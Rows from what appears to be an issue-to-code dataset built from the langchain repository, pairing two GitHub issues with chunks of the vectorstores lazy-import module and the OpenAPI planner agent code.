I will be submitting a PR for this feature request. | https://github.com/langchain-ai/langchain/issues/11627 | https://github.com/langchain-ai/langchain/pull/11632 | 28ee6a7c125f1eb209b6b6428d1a50040408ea9f | d0603c86b6dc559799c64033d330075a8744435e | "2023-10-10T20:55:53Z" | python | "2023-10-11T20:56:46Z" | libs/langchain/langchain/vectorstores/__init__.py | from langchain.vectorstores.starrocks import StarRocks
return StarRocks
def _import_supabase() -> Any:
from langchain.vectorstores.supabase import SupabaseVectorStore
return SupabaseVectorStore
def _import_tair() -> Any:
from langchain.vectorstores.tair import Tair
return Tair
def _import_tencentvectordb() -> Any:
from langchain.vectorstores.tencentvectordb import TencentVectorDB
return TencentVectorDB
def _import_tigris() -> Any:
from langchain.vectorstores.tigris import Tigris
return Tigris
def _import_timescalevector() -> Any:
from langchain.vectorstores.timescalevector import TimescaleVector
return TimescaleVector
def _import_typesense() -> Any:
from langchain.vectorstores.typesense import Typesense
return Typesense
def _import_usearch() -> Any:
from langchain.vectorstores.usearch import USearch
return USearch
def _import_vald() -> Any:
from langchain.vectorstores.vald import Vald
return Vald
def _import_vearch() -> Any:
from langchain.vectorstores.vearch import Vearch
return Vearch
def _import_vectara() -> Any: |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 11,627 | Add AzureCosmosDBVectorSearch VectorStore | ### Feature request
### Feature request
Azure Cosmos DB for MongoDB vCore enables users to efficiently store, index, and query high dimensional vector data stored directly in Azure Cosmos DB for MongoDB vCore. It contains similarity measures such as COS (cosine distance), L2 (Euclidean distance) or IP (inner product) which measures the distance between the data vectors and your query vector. The data vectors that are closest to your query vector are the ones that are found to be most similar semantically and retrieved during query time. The accompanying PR would add support for Langchain Python users to store vectors from document embeddings generated from APIs such as Azure OpenAI Embeddings or Hugging Face on Azure.
[Azure Cosmos DB for MongoDB vCore](https://learn.microsoft.com/en-us/azure/cosmos-db/mongodb/vcore/vector-search)
### Motivation
This capability described in the feature request is currently not available for Langchain Python.
### Your contribution
I will be submitting a PR for this feature request. | https://github.com/langchain-ai/langchain/issues/11627 | https://github.com/langchain-ai/langchain/pull/11632 | 28ee6a7c125f1eb209b6b6428d1a50040408ea9f | d0603c86b6dc559799c64033d330075a8744435e | "2023-10-10T20:55:53Z" | python | "2023-10-11T20:56:46Z" | libs/langchain/langchain/vectorstores/__init__.py | from langchain.vectorstores.vectara import Vectara
return Vectara
def _import_weaviate() -> Any:
from langchain.vectorstores.weaviate import Weaviate
return Weaviate
def _import_zep() -> Any:
from langchain.vectorstores.zep import ZepVectorStore
return ZepVectorStore
def _import_zilliz() -> Any:
from langchain.vectorstores.zilliz import Zilliz
return Zilliz
def __getattr__(name: str) -> Any:
if name == "AnalyticDB":
return _import_analyticdb()
elif name == "AlibabaCloudOpenSearch":
return _import_alibaba_cloud_open_search()
elif name == "AlibabaCloudOpenSearchSettings":
return _import_alibaba_cloud_open_search_settings()
elif name == "ElasticKnnSearch":
return _import_elastic_knn_search()
elif name == "ElasticVectorSearch":
return _import_elastic_vector_search()
elif name == "Annoy":
return _import_annoy()
elif name == "AtlasDB":
return _import_atlas()
elif name == "AwaDB":
return _import_awadb() |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 11,627 | Add AzureCosmosDBVectorSearch VectorStore | ### Feature request
### Feature request
Azure Cosmos DB for MongoDB vCore enables users to efficiently store, index, and query high dimensional vector data stored directly in Azure Cosmos DB for MongoDB vCore. It contains similarity measures such as COS (cosine distance), L2 (Euclidean distance) or IP (inner product) which measures the distance between the data vectors and your query vector. The data vectors that are closest to your query vector are the ones that are found to be most similar semantically and retrieved during query time. The accompanying PR would add support for Langchain Python users to store vectors from document embeddings generated from APIs such as Azure OpenAI Embeddings or Hugging Face on Azure.
[Azure Cosmos DB for MongoDB vCore](https://learn.microsoft.com/en-us/azure/cosmos-db/mongodb/vcore/vector-search)
### Motivation
This capability described in the feature request is currently not available for Langchain Python.
### Your contribution
I will be submitting a PR for this feature request. | https://github.com/langchain-ai/langchain/issues/11627 | https://github.com/langchain-ai/langchain/pull/11632 | 28ee6a7c125f1eb209b6b6428d1a50040408ea9f | d0603c86b6dc559799c64033d330075a8744435e | "2023-10-10T20:55:53Z" | python | "2023-10-11T20:56:46Z" | libs/langchain/langchain/vectorstores/__init__.py | elif name == "AzureSearch":
return _import_azuresearch()
elif name == "Bagel":
return _import_bageldb()
elif name == "Cassandra":
return _import_cassandra()
elif name == "Chroma":
return _import_chroma()
elif name == "Clarifai":
return _import_clarifai()
elif name == "ClickhouseSettings":
return _import_clickhouse_settings()
elif name == "Clickhouse":
return _import_clickhouse()
elif name == "DashVector":
return _import_dashvector()
elif name == "DeepLake":
return _import_deeplake()
elif name == "Dingo":
return _import_dingo()
elif name == "DocArrayInMemorySearch":
return _import_docarray_inmemory()
elif name == "DocArrayHnswSearch":
return _import_docarray_hnsw()
elif name == "ElasticsearchStore":
return _import_elasticsearch()
elif name == "Epsilla":
return _import_epsilla()
elif name == "FAISS":
return _import_faiss() |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 11,627 | Add AzureCosmosDBVectorSearch VectorStore | ### Feature request
### Feature request
Azure Cosmos DB for MongoDB vCore enables users to efficiently store, index, and query high dimensional vector data stored directly in Azure Cosmos DB for MongoDB vCore. It contains similarity measures such as COS (cosine distance), L2 (Euclidean distance) or IP (inner product) which measures the distance between the data vectors and your query vector. The data vectors that are closest to your query vector are the ones that are found to be most similar semantically and retrieved during query time. The accompanying PR would add support for Langchain Python users to store vectors from document embeddings generated from APIs such as Azure OpenAI Embeddings or Hugging Face on Azure.
[Azure Cosmos DB for MongoDB vCore](https://learn.microsoft.com/en-us/azure/cosmos-db/mongodb/vcore/vector-search)
### Motivation
This capability described in the feature request is currently not available for Langchain Python.
### Your contribution
I will be submitting a PR for this feature request. | https://github.com/langchain-ai/langchain/issues/11627 | https://github.com/langchain-ai/langchain/pull/11632 | 28ee6a7c125f1eb209b6b6428d1a50040408ea9f | d0603c86b6dc559799c64033d330075a8744435e | "2023-10-10T20:55:53Z" | python | "2023-10-11T20:56:46Z" | libs/langchain/langchain/vectorstores/__init__.py | elif name == "Hologres":
return _import_hologres()
elif name == "LanceDB":
return _import_lancedb()
elif name == "LLMRails":
return _import_llm_rails()
elif name == "Marqo":
return _import_marqo()
elif name == "MatchingEngine":
return _import_matching_engine()
elif name == "Meilisearch":
return _import_meilisearch()
elif name == "Milvus":
return _import_milvus()
elif name == "MomentoVectorIndex":
return _import_momento_vector_index()
elif name == "MongoDBAtlasVectorSearch":
return _import_mongodb_atlas()
elif name == "MyScaleSettings":
return _import_myscale_settings()
elif name == "MyScale":
return _import_myscale()
elif name == "Neo4jVector":
return _import_neo4j_vector()
elif name == "OpenSearchVectorSearch":
return _import_opensearch_vector_search()
elif name == "PGEmbedding":
return _import_pgembedding()
elif name == "PGVector":
return _import_pgvector() |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 11,627 | Add AzureCosmosDBVectorSearch VectorStore | ### Feature request
### Feature request
Azure Cosmos DB for MongoDB vCore enables users to efficiently store, index, and query high dimensional vector data stored directly in Azure Cosmos DB for MongoDB vCore. It contains similarity measures such as COS (cosine distance), L2 (Euclidean distance) or IP (inner product) which measures the distance between the data vectors and your query vector. The data vectors that are closest to your query vector are the ones that are found to be most similar semantically and retrieved during query time. The accompanying PR would add support for Langchain Python users to store vectors from document embeddings generated from APIs such as Azure OpenAI Embeddings or Hugging Face on Azure.
[Azure Cosmos DB for MongoDB vCore](https://learn.microsoft.com/en-us/azure/cosmos-db/mongodb/vcore/vector-search)
### Motivation
This capability described in the feature request is currently not available for Langchain Python.
### Your contribution
I will be submitting a PR for this feature request. | https://github.com/langchain-ai/langchain/issues/11627 | https://github.com/langchain-ai/langchain/pull/11632 | 28ee6a7c125f1eb209b6b6428d1a50040408ea9f | d0603c86b6dc559799c64033d330075a8744435e | "2023-10-10T20:55:53Z" | python | "2023-10-11T20:56:46Z" | libs/langchain/langchain/vectorstores/__init__.py | elif name == "Pinecone":
return _import_pinecone()
elif name == "Qdrant":
return _import_qdrant()
elif name == "Redis":
return _import_redis()
elif name == "Rockset":
return _import_rocksetdb()
elif name == "ScaNN":
return _import_scann()
elif name == "SingleStoreDB":
return _import_singlestoredb()
elif name == "SKLearnVectorStore":
return _import_sklearn()
elif name == "SQLiteVSS":
return _import_sqlitevss()
elif name == "StarRocks":
return _import_starrocks()
elif name == "SupabaseVectorStore":
return _import_supabase()
elif name == "Tair":
return _import_tair()
elif name == "TencentVectorDB":
return _import_tencentvectordb()
elif name == "Tigris":
return _import_tigris()
elif name == "TimescaleVector":
return _import_timescalevector()
elif name == "Typesense":
return _import_typesense() |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 11,627 | Add AzureCosmosDBVectorSearch VectorStore | ### Feature request
### Feature request
Azure Cosmos DB for MongoDB vCore enables users to efficiently store, index, and query high dimensional vector data stored directly in Azure Cosmos DB for MongoDB vCore. It contains similarity measures such as COS (cosine distance), L2 (Euclidean distance) or IP (inner product) which measures the distance between the data vectors and your query vector. The data vectors that are closest to your query vector are the ones that are found to be most similar semantically and retrieved during query time. The accompanying PR would add support for Langchain Python users to store vectors from document embeddings generated from APIs such as Azure OpenAI Embeddings or Hugging Face on Azure.
[Azure Cosmos DB for MongoDB vCore](https://learn.microsoft.com/en-us/azure/cosmos-db/mongodb/vcore/vector-search)
### Motivation
This capability described in the feature request is currently not available for Langchain Python.
### Your contribution
I will be submitting a PR for this feature request. | https://github.com/langchain-ai/langchain/issues/11627 | https://github.com/langchain-ai/langchain/pull/11632 | 28ee6a7c125f1eb209b6b6428d1a50040408ea9f | d0603c86b6dc559799c64033d330075a8744435e | "2023-10-10T20:55:53Z" | python | "2023-10-11T20:56:46Z" | libs/langchain/langchain/vectorstores/__init__.py | elif name == "USearch":
return _import_usearch()
elif name == "Vald":
return _import_vald()
elif name == "Vearch":
return _import_vearch()
elif name == "Vectara":
return _import_vectara()
elif name == "Weaviate":
return _import_weaviate()
elif name == "ZepVectorStore":
return _import_zep()
elif name == "Zilliz":
return _import_zilliz()
elif name == "VespaStore":
return _import_vespa()
else:
raise AttributeError(f"Could not find: {name}")
__all__ = [
"AlibabaCloudOpenSearch",
"AlibabaCloudOpenSearchSettings",
"AnalyticDB",
"Annoy",
"Annoy",
"AtlasDB",
"AtlasDB",
"AwaDB",
"AzureSearch",
"Bagel",
"Cassandra", |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 11,627 | Add AzureCosmosDBVectorSearch VectorStore | ### Feature request
### Feature request
Azure Cosmos DB for MongoDB vCore enables users to efficiently store, index, and query high dimensional vector data stored directly in Azure Cosmos DB for MongoDB vCore. It contains similarity measures such as COS (cosine distance), L2 (Euclidean distance) or IP (inner product) which measures the distance between the data vectors and your query vector. The data vectors that are closest to your query vector are the ones that are found to be most similar semantically and retrieved during query time. The accompanying PR would add support for Langchain Python users to store vectors from document embeddings generated from APIs such as Azure OpenAI Embeddings or Hugging Face on Azure.
[Azure Cosmos DB for MongoDB vCore](https://learn.microsoft.com/en-us/azure/cosmos-db/mongodb/vcore/vector-search)
### Motivation
This capability described in the feature request is currently not available for Langchain Python.
### Your contribution
I will be submitting a PR for this feature request. | https://github.com/langchain-ai/langchain/issues/11627 | https://github.com/langchain-ai/langchain/pull/11632 | 28ee6a7c125f1eb209b6b6428d1a50040408ea9f | d0603c86b6dc559799c64033d330075a8744435e | "2023-10-10T20:55:53Z" | python | "2023-10-11T20:56:46Z" | libs/langchain/langchain/vectorstores/__init__.py | "Chroma",
"Chroma",
"Clarifai",
"Clickhouse",
"ClickhouseSettings",
"DashVector",
"DeepLake",
"DeepLake",
"Dingo",
"DocArrayHnswSearch",
"DocArrayInMemorySearch",
"ElasticKnnSearch",
"ElasticVectorSearch",
"ElasticsearchStore",
"Epsilla",
"FAISS",
"Hologres",
"LanceDB",
"LLMRails",
"Marqo",
"MatchingEngine",
"Meilisearch",
"Milvus",
"MomentoVectorIndex",
"MongoDBAtlasVectorSearch",
"MyScale",
"MyScaleSettings",
"Neo4jVector",
"OpenSearchVectorSearch",
"OpenSearchVectorSearch", |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 11,627 | Add AzureCosmosDBVectorSearch VectorStore | ### Feature request
### Feature request
Azure Cosmos DB for MongoDB vCore enables users to efficiently store, index, and query high dimensional vector data stored directly in Azure Cosmos DB for MongoDB vCore. It contains similarity measures such as COS (cosine distance), L2 (Euclidean distance) or IP (inner product) which measures the distance between the data vectors and your query vector. The data vectors that are closest to your query vector are the ones that are found to be most similar semantically and retrieved during query time. The accompanying PR would add support for Langchain Python users to store vectors from document embeddings generated from APIs such as Azure OpenAI Embeddings or Hugging Face on Azure.
[Azure Cosmos DB for MongoDB vCore](https://learn.microsoft.com/en-us/azure/cosmos-db/mongodb/vcore/vector-search)
### Motivation
This capability described in the feature request is currently not available for Langchain Python.
### Your contribution
I will be submitting a PR for this feature request. | https://github.com/langchain-ai/langchain/issues/11627 | https://github.com/langchain-ai/langchain/pull/11632 | 28ee6a7c125f1eb209b6b6428d1a50040408ea9f | d0603c86b6dc559799c64033d330075a8744435e | "2023-10-10T20:55:53Z" | python | "2023-10-11T20:56:46Z" | libs/langchain/langchain/vectorstores/__init__.py | "PGEmbedding",
"PGVector",
"Pinecone",
"Qdrant",
"Redis",
"Rockset",
"SKLearnVectorStore",
"ScaNN",
"SingleStoreDB",
"SingleStoreDB",
"SQLiteVSS",
"StarRocks",
"SupabaseVectorStore",
"Tair",
"Tigris",
"TimescaleVector",
"Typesense",
"USearch",
"Vald",
"Vearch",
"Vectara",
"VectorStore",
"VespaStore",
"Weaviate",
"ZepVectorStore",
"Zilliz",
"Zilliz",
"TencentVectorDB",
] |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 2,938 | Allow OpenAPI planner to respect URLs with placeholders | In OpenAPI documentation, an endpoint might include a placeholder for a parameter:
```
GET /states/{abbr}
```
Currently, exact matches are needed with OpenAPI Planner to retrieve documentation. In the example above, `GET /states/FL` would receive a `ValueError(f"{endpoint_name} endpoint does not exist.")`.
| https://github.com/langchain-ai/langchain/issues/2938 | https://github.com/langchain-ai/langchain/pull/2940 | e42a576cb2973e36f310e1db45d75b8fa5ba9cf6 | 48cf9783913077fdad7c26752c7a70b20b57fb30 | "2023-04-15T13:54:15Z" | python | "2023-10-12T23:20:32Z" | libs/langchain/langchain/agents/agent_toolkits/openapi/planner.py | """Agent that interacts with OpenAPI APIs via a hierarchical planning approach."""
import json
import re
from functools import partial
from typing import Any, Callable, Dict, List, Optional
import yaml
from langchain.agents.agent import AgentExecutor
from langchain.agents.agent_toolkits.openapi.planner_prompt import (
API_CONTROLLER_PROMPT,
API_CONTROLLER_TOOL_DESCRIPTION,
API_CONTROLLER_TOOL_NAME,
API_ORCHESTRATOR_PROMPT,
API_PLANNER_PROMPT,
API_PLANNER_TOOL_DESCRIPTION,
API_PLANNER_TOOL_NAME,
PARSING_DELETE_PROMPT,
PARSING_GET_PROMPT,
PARSING_PATCH_PROMPT,
PARSING_POST_PROMPT,
PARSING_PUT_PROMPT,
REQUESTS_DELETE_TOOL_DESCRIPTION,
REQUESTS_GET_TOOL_DESCRIPTION,
REQUESTS_PATCH_TOOL_DESCRIPTION,
REQUESTS_POST_TOOL_DESCRIPTION,
REQUESTS_PUT_TOOL_DESCRIPTION, |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 2,938 | Allow OpenAPI planner to respect URLs with placeholders | In OpenAPI documentation, an endpoint might include a placeholder for a parameter:
```
GET /states/{abbr}
```
Currently, exact matches are needed with OpenAPI Planner to retrieve documentation. In the example above, `GET /states/FL` would receive a `ValueError(f"{endpoint_name} endpoint does not exist.")`.
| https://github.com/langchain-ai/langchain/issues/2938 | https://github.com/langchain-ai/langchain/pull/2940 | e42a576cb2973e36f310e1db45d75b8fa5ba9cf6 | 48cf9783913077fdad7c26752c7a70b20b57fb30 | "2023-04-15T13:54:15Z" | python | "2023-10-12T23:20:32Z" | libs/langchain/langchain/agents/agent_toolkits/openapi/planner.py | )
from langchain.agents.agent_toolkits.openapi.spec import ReducedOpenAPISpec
from langchain.agents.mrkl.base import ZeroShotAgent
from langchain.agents.tools import Tool
from langchain.callbacks.base import BaseCallbackManager
from langchain.chains.llm import LLMChain
from langchain.llms.openai import OpenAI
from langchain.memory import ReadOnlySharedMemory
from langchain.prompts import PromptTemplate
from langchain.pydantic_v1 import Field
from langchain.schema import BasePromptTemplate
from langchain.schema.language_model import BaseLanguageModel
from langchain.tools.base import BaseTool
from langchain.tools.requests.tool import BaseRequestsTool
from langchain.utilities.requests import RequestsWrapper
#
#
MAX_RESPONSE_LENGTH = 5000
"""Maximum length of the response to be returned."""
def _get_default_llm_chain(prompt: BasePromptTemplate) -> LLMChain:
return LLMChain(
llm=OpenAI(),
prompt=prompt,
)
def _get_default_llm_chain_factory(
prompt: BasePromptTemplate,
) -> Callable[[], LLMChain]:
"""Returns a default LLMChain factory."""
return partial(_get_default_llm_chain, prompt)
class RequestsGetToolWithParsing(BaseRequestsTool, BaseTool): |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 2,938 | Allow OpenAPI planner to respect URLs with placeholders | In OpenAPI documentation, an endpoint might include a placeholder for a parameter:
```
GET /states/{abbr}
```
Currently, exact matches are needed with OpenAPI Planner to retrieve documentation. In the example above, `GET /states/FL` would receive a `ValueError(f"{endpoint_name} endpoint does not exist.")`.
| https://github.com/langchain-ai/langchain/issues/2938 | https://github.com/langchain-ai/langchain/pull/2940 | e42a576cb2973e36f310e1db45d75b8fa5ba9cf6 | 48cf9783913077fdad7c26752c7a70b20b57fb30 | "2023-04-15T13:54:15Z" | python | "2023-10-12T23:20:32Z" | libs/langchain/langchain/agents/agent_toolkits/openapi/planner.py | """Requests GET tool with LLM-instructed extraction of truncated responses."""
name: str = "requests_get"
"""Tool name."""
description = REQUESTS_GET_TOOL_DESCRIPTION
"""Tool description."""
response_length: Optional[int] = MAX_RESPONSE_LENGTH
"""Maximum length of the response to be returned."""
llm_chain: LLMChain = Field(
default_factory=_get_default_llm_chain_factory(PARSING_GET_PROMPT)
)
"""LLMChain used to extract the response."""
def _run(self, text: str) -> str:
try:
data = json.loads(text)
except json.JSONDecodeError as e:
raise e
data_params = data.get("params")
response = self.requests_wrapper.get(data["url"], params=data_params)
response = response[: self.response_length]
return self.llm_chain.predict(
response=response, instructions=data["output_instructions"]
).strip()
async def _arun(self, text: str) -> str:
raise NotImplementedError()
class RequestsPostToolWithParsing(BaseRequestsTool, BaseTool): |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 2,938 | Allow OpenAPI planner to respect URLs with placeholders | In OpenAPI documentation, an endpoint might include a placeholder for a parameter:
```
GET /states/{abbr}
```
Currently, exact matches are needed with OpenAPI Planner to retrieve documentation. In the example above, `GET /states/FL` would receive a `ValueError(f"{endpoint_name} endpoint does not exist.")`.
| https://github.com/langchain-ai/langchain/issues/2938 | https://github.com/langchain-ai/langchain/pull/2940 | e42a576cb2973e36f310e1db45d75b8fa5ba9cf6 | 48cf9783913077fdad7c26752c7a70b20b57fb30 | "2023-04-15T13:54:15Z" | python | "2023-10-12T23:20:32Z" | libs/langchain/langchain/agents/agent_toolkits/openapi/planner.py | """Requests POST tool with LLM-instructed extraction of truncated responses."""
name: str = "requests_post"
"""Tool name."""
description = REQUESTS_POST_TOOL_DESCRIPTION
"""Tool description."""
response_length: Optional[int] = MAX_RESPONSE_LENGTH
"""Maximum length of the response to be returned."""
llm_chain: LLMChain = Field(
default_factory=_get_default_llm_chain_factory(PARSING_POST_PROMPT)
)
"""LLMChain used to extract the response."""
def _run(self, text: str) -> str:
try:
data = json.loads(text)
except json.JSONDecodeError as e:
raise e
response = self.requests_wrapper.post(data["url"], data["data"])
response = response[: self.response_length]
return self.llm_chain.predict(
response=response, instructions=data["output_instructions"]
).strip()
async def _arun(self, text: str) -> str:
raise NotImplementedError()
class RequestsPatchToolWithParsing(BaseRequestsTool, BaseTool): |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 2,938 | Allow OpenAPI planner to respect URLs with placeholders | In OpenAPI documentation, an endpoint might include a placeholder for a parameter:
```
GET /states/{abbr}
```
Currently, exact matches are needed with OpenAPI Planner to retrieve documentation. In the example above, `GET /states/FL` would receive a `ValueError(f"{endpoint_name} endpoint does not exist.")`.
| https://github.com/langchain-ai/langchain/issues/2938 | https://github.com/langchain-ai/langchain/pull/2940 | e42a576cb2973e36f310e1db45d75b8fa5ba9cf6 | 48cf9783913077fdad7c26752c7a70b20b57fb30 | "2023-04-15T13:54:15Z" | python | "2023-10-12T23:20:32Z" | libs/langchain/langchain/agents/agent_toolkits/openapi/planner.py | """Requests PATCH tool with LLM-instructed extraction of truncated responses."""
name: str = "requests_patch"
"""Tool name."""
description = REQUESTS_PATCH_TOOL_DESCRIPTION
"""Tool description."""
response_length: Optional[int] = MAX_RESPONSE_LENGTH
"""Maximum length of the response to be returned."""
llm_chain: LLMChain = Field(
default_factory=_get_default_llm_chain_factory(PARSING_PATCH_PROMPT)
)
"""LLMChain used to extract the response."""
def _run(self, text: str) -> str:
try:
data = json.loads(text)
except json.JSONDecodeError as e:
raise e
response = self.requests_wrapper.patch(data["url"], data["data"])
response = response[: self.response_length]
return self.llm_chain.predict(
response=response, instructions=data["output_instructions"]
).strip()
async def _arun(self, text: str) -> str:
raise NotImplementedError()
class RequestsPutToolWithParsing(BaseRequestsTool, BaseTool): |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 2,938 | Allow OpenAPI planner to respect URLs with placeholders | In OpenAPI documentation, an endpoint might include a placeholder for a parameter:
```
GET /states/{abbr}
```
Currently, exact matches are needed with OpenAPI Planner to retrieve documentation. In the example above, `GET /states/FL` would receive a `ValueError(f"{endpoint_name} endpoint does not exist.")`.
| https://github.com/langchain-ai/langchain/issues/2938 | https://github.com/langchain-ai/langchain/pull/2940 | e42a576cb2973e36f310e1db45d75b8fa5ba9cf6 | 48cf9783913077fdad7c26752c7a70b20b57fb30 | "2023-04-15T13:54:15Z" | python | "2023-10-12T23:20:32Z" | libs/langchain/langchain/agents/agent_toolkits/openapi/planner.py | """Requests PUT tool with LLM-instructed extraction of truncated responses."""
name: str = "requests_put"
"""Tool name."""
description = REQUESTS_PUT_TOOL_DESCRIPTION
"""Tool description."""
response_length: Optional[int] = MAX_RESPONSE_LENGTH
"""Maximum length of the response to be returned."""
llm_chain: LLMChain = Field(
default_factory=_get_default_llm_chain_factory(PARSING_PUT_PROMPT)
)
"""LLMChain used to extract the response."""
def _run(self, text: str) -> str:
try:
data = json.loads(text)
except json.JSONDecodeError as e:
raise e
response = self.requests_wrapper.put(data["url"], data["data"])
response = response[: self.response_length]
return self.llm_chain.predict(
response=response, instructions=data["output_instructions"]
).strip()
async def _arun(self, text: str) -> str:
raise NotImplementedError()
class RequestsDeleteToolWithParsing(BaseRequestsTool, BaseTool): |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 2,938 | Allow OpenAPI planner to respect URLs with placeholders | In OpenAPI documentation, an endpoint might include a placeholder for a parameter:
```
GET /states/{abbr}
```
Currently, exact matches are needed with OpenAPI Planner to retrieve documentation. In the example above, `GET /states/FL` would receive a `ValueError(f"{endpoint_name} endpoint does not exist.")`.
| https://github.com/langchain-ai/langchain/issues/2938 | https://github.com/langchain-ai/langchain/pull/2940 | e42a576cb2973e36f310e1db45d75b8fa5ba9cf6 | 48cf9783913077fdad7c26752c7a70b20b57fb30 | "2023-04-15T13:54:15Z" | python | "2023-10-12T23:20:32Z" | libs/langchain/langchain/agents/agent_toolkits/openapi/planner.py | """A tool that sends a DELETE request and parses the response."""
name: str = "requests_delete"
"""The name of the tool."""
description = REQUESTS_DELETE_TOOL_DESCRIPTION
"""The description of the tool."""
response_length: Optional[int] = MAX_RESPONSE_LENGTH
"""The maximum length of the response."""
llm_chain: LLMChain = Field(
default_factory=_get_default_llm_chain_factory(PARSING_DELETE_PROMPT)
)
"""The LLM chain used to parse the response."""
def _run(self, text: str) -> str:
try:
data = json.loads(text)
except json.JSONDecodeError as e:
raise e
response = self.requests_wrapper.delete(data["url"])
response = response[: self.response_length]
return self.llm_chain.predict(
response=response, instructions=data["output_instructions"]
).strip()
async def _arun(self, text: str) -> str: |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 2,938 | Allow OpenAPI planner to respect URLs with placeholders | In OpenAPI documentation, an endpoint might include a placeholder for a parameter:
```
GET /states/{abbr}
```
Currently, exact matches are needed with OpenAPI Planner to retrieve documentation. In the example above, `GET /states/FL` would receive a `ValueError(f"{endpoint_name} endpoint does not exist.")`.
| https://github.com/langchain-ai/langchain/issues/2938 | https://github.com/langchain-ai/langchain/pull/2940 | e42a576cb2973e36f310e1db45d75b8fa5ba9cf6 | 48cf9783913077fdad7c26752c7a70b20b57fb30 | "2023-04-15T13:54:15Z" | python | "2023-10-12T23:20:32Z" | libs/langchain/langchain/agents/agent_toolkits/openapi/planner.py | raise NotImplementedError()
#
#
def _create_api_planner_tool(
api_spec: ReducedOpenAPISpec, llm: BaseLanguageModel
) -> Tool:
endpoint_descriptions = [
f"{name} {description}" for name, description, _ in api_spec.endpoints
]
prompt = PromptTemplate(
template=API_PLANNER_PROMPT,
input_variables=["query"],
partial_variables={"endpoints": "- " + "- ".join(endpoint_descriptions)},
)
chain = LLMChain(llm=llm, prompt=prompt)
tool = Tool(
name=API_PLANNER_TOOL_NAME,
description=API_PLANNER_TOOL_DESCRIPTION,
func=chain.run,
)
return tool
def _create_api_controller_agent( |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 2,938 | Allow OpenAPI planner to respect URLs with placeholders | In OpenAPI documentation, an endpoint might include a placeholder for a parameter:
```
GET /states/{abbr}
```
Currently, exact matches are needed with OpenAPI Planner to retrieve documentation. In the example above, `GET /states/FL` would receive a `ValueError(f"{endpoint_name} endpoint does not exist.")`.
| https://github.com/langchain-ai/langchain/issues/2938 | https://github.com/langchain-ai/langchain/pull/2940 | e42a576cb2973e36f310e1db45d75b8fa5ba9cf6 | 48cf9783913077fdad7c26752c7a70b20b57fb30 | "2023-04-15T13:54:15Z" | python | "2023-10-12T23:20:32Z" | libs/langchain/langchain/agents/agent_toolkits/openapi/planner.py | api_url: str,
api_docs: str,
requests_wrapper: RequestsWrapper,
llm: BaseLanguageModel,
) -> AgentExecutor:
get_llm_chain = LLMChain(llm=llm, prompt=PARSING_GET_PROMPT)
post_llm_chain = LLMChain(llm=llm, prompt=PARSING_POST_PROMPT)
tools: List[BaseTool] = [
RequestsGetToolWithParsing(
requests_wrapper=requests_wrapper, llm_chain=get_llm_chain
),
RequestsPostToolWithParsing(
requests_wrapper=requests_wrapper, llm_chain=post_llm_chain
), |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 2,938 | Allow OpenAPI planner to respect URLs with placeholders | In OpenAPI documentation, an endpoint might include a placeholder for a parameter:
```
GET /states/{abbr}
```
Currently, exact matches are needed with OpenAPI Planner to retrieve documentation. In the example above, `GET /states/FL` would receive a `ValueError(f"{endpoint_name} endpoint does not exist.")`.
| https://github.com/langchain-ai/langchain/issues/2938 | https://github.com/langchain-ai/langchain/pull/2940 | e42a576cb2973e36f310e1db45d75b8fa5ba9cf6 | 48cf9783913077fdad7c26752c7a70b20b57fb30 | "2023-04-15T13:54:15Z" | python | "2023-10-12T23:20:32Z" | libs/langchain/langchain/agents/agent_toolkits/openapi/planner.py | ]
prompt = PromptTemplate(
template=API_CONTROLLER_PROMPT,
input_variables=["input", "agent_scratchpad"],
partial_variables={
"api_url": api_url,
"api_docs": api_docs,
"tool_names": ", ".join([tool.name for tool in tools]),
"tool_descriptions": "\n".join(
[f"{tool.name}: {tool.description}" for tool in tools]
),
},
)
agent = ZeroShotAgent(
llm_chain=LLMChain(llm=llm, prompt=prompt),
allowed_tools=[tool.name for tool in tools],
)
return AgentExecutor.from_agent_and_tools(agent=agent, tools=tools, verbose=True)
def _create_api_controller_tool(
api_spec: ReducedOpenAPISpec,
requests_wrapper: RequestsWrapper,
llm: BaseLanguageModel,
) -> Tool:
"""Expose controller as a tool.
The tool is invoked with a plan from the planner, and dynamically
creates a controller agent with relevant documentation only to
constrain the context.
"""
base_url = api_spec.servers[0]["url"]
def _create_and_run_api_controller_agent(plan_str: str) -> str: |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 2,938 | Allow OpenAPI planner to respect URLs with placeholders | In OpenAPI documentation, an endpoint might include a placeholder for a parameter:
```
GET /states/{abbr}
```
Currently, exact matches are needed with OpenAPI Planner to retrieve documentation. In the example above, `GET /states/FL` would receive a `ValueError(f"{endpoint_name} endpoint does not exist.")`.
| https://github.com/langchain-ai/langchain/issues/2938 | https://github.com/langchain-ai/langchain/pull/2940 | e42a576cb2973e36f310e1db45d75b8fa5ba9cf6 | 48cf9783913077fdad7c26752c7a70b20b57fb30 | "2023-04-15T13:54:15Z" | python | "2023-10-12T23:20:32Z" | libs/langchain/langchain/agents/agent_toolkits/openapi/planner.py | pattern = r"\b(GET|POST|PATCH|DELETE)\s+(/\S+)*"
matches = re.findall(pattern, plan_str)
endpoint_names = [
"{method} {route}".format(method=method, route=route.split("?")[0])
for method, route in matches
]
endpoint_docs_by_name = {name: docs for name, _, docs in api_spec.endpoints}
docs_str = ""
for endpoint_name in endpoint_names:
docs = endpoint_docs_by_name.get(endpoint_name)
if not docs:
raise ValueError(f"{endpoint_name} endpoint does not exist.")
docs_str += f"== Docs for {endpoint_name} == \n{yaml.dump(docs)}\n"
agent = _create_api_controller_agent(base_url, docs_str, requests_wrapper, llm)
